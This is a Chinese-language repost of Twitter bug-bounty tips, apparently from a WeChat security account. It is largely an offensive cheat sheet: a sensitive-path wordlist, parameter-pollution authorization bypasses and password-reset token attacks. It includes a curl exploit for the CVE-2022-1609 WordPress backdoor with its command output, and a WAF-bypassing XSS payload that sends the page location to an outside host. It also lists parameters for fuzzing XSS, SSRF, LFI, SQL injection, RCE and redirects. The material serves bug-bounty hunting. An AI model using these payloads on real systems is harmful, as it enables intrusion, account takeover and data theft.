字典Tips
/.git/HEAD/.git/logs/HEAD/.import//.bashrc/admin-cgi/admin-console/backup//console//console/login/h2console/cgi-bin/admin.cgi/jmx-console//portal//portal/login/syslog//web-console
未授权漏洞挖掘tips
{“id”:111}⟶ 401 Unauthorized{“id”:{“id”:111}} ⟶ 200 OKPOST /api/get_profileContent-Type: application/json {“user_id”:<attacker_id>,”user_id”:<victim’s_id>}GET /api_v1/messages?user_id=VICTIM_ID ⟶ 401GET /api_v1/messages?user_id=VICTIM_ID ⟶ 401GET /api_v1/messages?user_id=attack&user_id=VICTIM ⟶ 200 OK
Github黑客语法tips
User:XXX First Name Last NameUser:XXX Firstname LastnameUser:XXX Full NameUser:XXX Fullname
密码重置挖洞Tips
1- Completely remove the token2- change it to 00000000...3- use null/nil value4- try expired token5- try an array of old tokens6- look for race conditions7- change 1 char at the begin/end to see if the token is evaluated8- use unicode char jutzu to spoof email address9- try [email protected]&attacker@email.com use %20 or | as separators10- try to register the same mail with different TLD (.eu,.net etc)11- don't add the domain locu@12- try sqli bypass and wildcard or, %, *13- request smuggler?14 - change request method (get, put, post etc) and/or content type (xml<>json)15- match bad response and replace with good one16- use super long string17-Send a massive token18- Send null fields19-Send a -*-*-*--""---*-*;*;*-*--*-*;*;*-*-*+;**;;*+*+*!*!*+*++*;*;*+*+*+*++*;
翻译后
1-完全删除令牌2-将其更改为00000000。。。3-使用空/空值4-试用过期令牌5-尝试一组旧令牌6-试试条件竞争7-在开始/结束处更改1个字符,以查看是否对标记进行了评估8-使用unicode字符juzi欺骗电子邮件地址9-尝试[email protected]&[email protected]使用%20或|作为分隔符10-尝试用不同的TLD(.eu、.net等)注册同一邮件11-不添加域@12-尝试sqli旁路和通配符或,%*13-请求走私者?14-更改请求方法(get、put、post等)和/或内容类型(xml<>json)15-匹配不良响应并替换为良好响应16-使用超长字符串17发送大量token18-发送空字段19发送-*-*-*-*-“”-*-*-*;*;*-*-*-*-*;*;*-*-*+;***;;*+*+*!*!*+*++*++*;*;*+*+*++*++*;
来源:
here some password reset flaws:
1- Completely remove the token
2- change it to 00000000...
3- use null/nil value
4- try expired token
5- try an array of old tokens
6- look for race conditions#infosec #CyberSecurity #bugbountytips #bugbounty— Omar Atallah 🇵🇸 (@Omar_J_Ahmed) May 28, 2022
CVE-2022-1609 WordPress Weblizar Backdoor
$ curl -s -d 'blowfish=1' -d "blowf=system('id');" 'http://localhost:8888/wp-json/am-member/license'uid=33(www-data) gid=33(www-data) groups=33(www-data)
来源:
https://twitter.com/momika233/status/1529694086193508353?s=20&t=WC6ryJ-bM7QVkDzU71iusg
Akamai XSS WAF Bypass
"><a/test="%26quot;x%26quot;"href='%01javascript:/*%b1*/;location.assign("//hackerone.com/stealthy?x="+location)'>Click来源:
Akamai XSS WAF bypass. Working in all browsers.
"><a/test="%26quot;x%26quot;"href='%01javascript:/*%b1*/;location.assign("//hackerone.com/stealthy?x="+location)'>Click#xss #bugbounty #bugbountytips #bugbountytips #infosec #xsspayloads #hacking #ethicalhacking
— Md Ismail Šojal (@0x0SojalSec) May 25, 2022
下面的这些参数可用于工具挖掘漏洞或手动挖掘漏洞的常用参数,看到相关的参数可以往相关的漏洞去挖掘去fuzz验证。
XSS漏洞常见参数
?q={payload}?s={payload}?search={payload}?id={payload}?lang={payload}?keyword={payload}?query={payload}?page={payload}?keywords={payload}?year={payload}?view={payload}?email={payload}?type={payload}?name={payload}?p={payload}?month={payload}?image={payload}?list_type={payload}?url={payload}?terms={payload}?categoryid={payload}?key={payload}?login={payload}?begindate={payload}?enddate={payload}
SSRF漏洞常见参数
?dest={target}?redirect={target}?uri={target}?path={target}?continue={target}?url={target}?window={target}?next={target}?data={target}?reference={target}?site={target}?html={target}?val={target}?validate={target}?domain={target}?callback={target}?return={target}?page={target}?feed={target}?host={target}?port={target}?to={target}?out={target}?view={target}?dir={target}
来源:https://twitter.com/NandanLohitaksh/status/1520254745402773510?s=20&t=WC6ryJ-bM7QVkDzU71iusg
LFI本地文件包含漏洞常见参数
?cat={payload}?dir={payload}?action={payload}?board={payload}?date={payload}?detail={payload}?file={payload}?download={payload}?path={payload}?folder={payload}?prefix={payload}?include={payload}?page={payload}?inc={payload}?locate={payload}?show={payload}?doc={payload}?site={payload}?type={payload}?view={payload}?content={payload}?document={payload}?layout={payload}?mod={payload}?conf={payload}
SQL注入漏洞常见参数
?id=?page=?dir=?search=?category=?file=?class=?url=?news=?item=?menu=?lang=?name=?ref=?title=?view=?topic=?thread=?type=?date=?form=?join=?main=?nav=?region=
RCE远程代码常见参数
?cmd=?exec=?command=?execute=?ping=?query=?jump=?code=?reg=?do=?func=?arg=?option=?load=?process=?step=?read=?function=?req=?feature=?exe=?module=?payload=?run=?print=
URL重定向漏洞常见参数
?next={payload}?url={payload}?target={payload}?rurl={payload}?dest={payload}?destination={payload}?redir={payload}?redirect_uri={payload}?redirect_url={payload}?redirect={payload}/redirect/{payload}/cgi-bin/redirect.cgi?{payload}/out/{payload}/out?{payload}?view={payload}/login?to={payload}?image_url={payload}?go={payload}?return={payload}?returnTo={payload}?return_to={payload}?checkout_url={payload}?continue={payload}?return_path={payload}
来源:https://github.com/lutfumertceylan/top25-parameter
邮件密码重置漏洞Tips
在密码重置时尝试多封电子邮件,并检查您的两个电子邮件帐户是否有邮件
🔹 email=victim&email=attacker🔹 email[]=victim&email[]=attacker🔹 email=victim,attacker🔹 {email: victim, email:attacker}🔹 {email: [victim,attacker]}
原文始发于微信公众号(HACK学习呀):干货 | Twitter渗透技巧搬运工(三)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论